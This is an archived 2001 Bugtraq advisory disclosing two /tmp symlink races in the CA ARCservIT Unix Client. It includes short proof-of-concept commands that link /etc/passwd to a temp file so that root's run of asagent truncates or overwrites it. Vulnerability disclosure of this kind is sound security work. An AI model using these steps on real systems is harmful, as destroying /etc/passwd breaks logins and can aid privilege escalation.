Bugtraq mailing list archives
tmp-races in ARCservIT Unix Client
From: Jonas Eriksson <je () sekure net>
Date: Fri, 18 May 2001 11:10:31 +0200 (CEST)
Hi, Computer Associates ARCservIT Client version 6.6x has atleast two /tmp races, as following: Vulnerability #1 ----------------- This tmp-race only works if the asagent client never been executed before. As user: je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp And root: root@boxname# /usr/CYEagent/asagent start CA Universal Agent ADV v1.39 started on openview SunOS 5.8 Generic_108528-07 sun4u ARCserveIT Universal Agent started... Then, je@boxname~> ls -la /etc/passwd -r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd Vulnerability #2 ----------------- As user: je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp And root: root@boxname# /usr/CYEagent/asagent inet add Then, je@boxname~> cat /etc/passwd asagentd 6051/tcp # ARCserve agent asagentd 6051/udp # ARCserve agent Computer Associates has been informed. Regards Jonas Eriksson
Current thread:
- tmp-races in ARCservIT Unix Client Jonas Eriksson (May 18)